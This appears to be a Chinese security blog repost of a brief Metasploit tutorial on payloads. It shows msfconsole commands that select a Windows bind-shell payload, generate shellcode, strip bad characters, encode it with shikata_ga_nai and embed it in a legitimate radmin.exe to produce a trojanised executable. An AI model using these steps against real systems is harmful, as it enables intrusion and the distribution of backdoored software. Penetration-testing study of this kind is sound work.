metasploit framework——payload

admin 2023年1月17日14:13:41评论16 views字数 1496阅读4分59秒阅读模式



metasploit framework——payload



前言

使用exploit是为了将payload在目标机上执行

1、payload使用

msfconsole
msfconsolemsf > show payloads #查看可用payloadmsf > use payload/windows/shell_bind_tcp #这是个绑定端口shellmsf payload(windows/shell/bind_tcp) > show options #查看设置msf payload(windows/shell/bind_tcp) > generate  #获得shellcode,是ruby语言写的msf payload(windows/shell/bind_tcp) > generate -h    Usage: generate [options]    Generates a payload.    OPTIONS:        -E        强制编码。        -b <opt>  要避免的字符列表:' x00  xff'        -e <opt>  要使用的编码器模块的名称。        -f <opt>  输出文件名(否则为stdout)        -h        帮助横幅。        -i <opt>  编码迭代的次数。        -k        保持模板可执行的功能        -o <opt>  以VAR = VAL格式逗号分隔的选项列表。        -p <opt>  输出平台        -s <opt>  NOP sled length.        -t <opt>  输出格式: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war        -x <opt>  要使用的可执行模板#绕过坏字符msf payload(windows/shell/bind_tcp) > generate -b 'x00'msf payload(windows/shell/bind_tcp) > generate -b 'x00x44x67x66xfax01xe0x44x67xa1xa2xa3x75x4b' #generate会自动选择最合适的#如果要排除的坏字符太多,可能就没有合适的shellcode了#手动指定编码模块msf payload(windows/shell/bind_tcp) > show encoders#注入文件msf payload(windows/shell/bind_tcp) > generate -b 'x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe

结语

熟悉payload





   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):metasploit framework——payload

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月17日14:13:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   metasploit framework——payloadhttp://cn-sec.com/archives/1432419.html

发表评论

匿名网友 填写信息